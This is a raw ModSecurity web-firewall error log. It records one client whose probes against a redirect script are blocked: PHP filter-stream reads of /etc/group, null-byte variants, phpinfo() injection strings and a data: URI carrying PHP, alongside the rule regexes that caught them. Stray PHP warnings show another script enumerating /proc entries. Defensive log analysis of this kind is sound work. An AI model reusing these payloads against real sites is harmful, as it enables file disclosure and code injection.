[Tue May 12 05:32:46.502705 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignwAAAFU"]
[Tue May 12 05:32:46.641716 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoAAAAFU"]
[Tue May 12 05:32:46.641867 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoAAAAFU"]
[Tue May 12 05:32:46.642462 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoAAAAFU"]
[Tue May 12 05:32:46.642719 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoAAAAFU"]
[Tue May 12 05:32:46.781337 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoQAAAFU"]
[Tue May 12 05:32:46.781390 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoQAAAFU"]
[Tue May 12 05:32:46.781609 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoQAAAFU"]
[Tue May 12 05:32:46.781721 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/read=string.rot13/resource=/etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoQAAAFU"]
[Tue May 12 05:32:46.782321 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoQAAAFU"]
[Tue May 12 05:32:46.782592 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigoQAAAFU"]
[Tue May 12 05:32:46.922712 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo();phpinfo();phpinfo() found within ARGS:url: phpinfo();phpinfo();phpinfo();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigogAAAFU"]
[Tue May 12 05:32:46.923450 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigogAAAFU"]
[Tue May 12 05:32:46.923799 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigogAAAFU"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704825/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704825/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704825/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704825/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704825/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704825/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:32:47.062682 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo();phpinfo() found within ARGS:url: phpinfo();phpinfo();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigowAAAFU"]
[Tue May 12 05:32:47.063198 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigowAAAFU"]
[Tue May 12 05:32:47.063438 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigowAAAFU"]
[Tue May 12 05:32:47.202536 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo()|phpinfo() found within ARGS:url: phpinfo()|phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpAAAAFU"]
[Tue May 12 05:32:47.203099 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpAAAAFU"]
[Tue May 12 05:32:47.203337 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpAAAAFU"]
[Tue May 12 05:32:47.342268 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo()|phpinfo()|phpinfo() found within ARGS:url: phpinfo()|phpinfo()|phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpQAAAFU"]
[Tue May 12 05:32:47.342780 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpQAAAFU"]
[Tue May 12 05:32:47.343034 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpQAAAFU"]
[Tue May 12 05:32:47.481705 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpgAAAFU"]
[Tue May 12 05:32:47.482902 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:, found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpgAAAFU"]
[Tue May 12 05:32:47.483301 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpgAAAFU"]
[Tue May 12 05:32:47.483551 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpgAAAFU"]
[Tue May 12 05:32:47.622965 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpwAAAFU"]
[Tue May 12 05:32:47.623018 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpwAAAFU"]
[Tue May 12 05:32:47.623274 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:,<?php phpinfo(); ?>\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpwAAAFU"]
[Tue May 12 05:32:47.623482 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:, found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpwAAAFU"]
[Tue May 12 05:32:47.623866 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpwAAAFU"]
[Tue May 12 05:32:47.624123 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigpwAAAFU"]
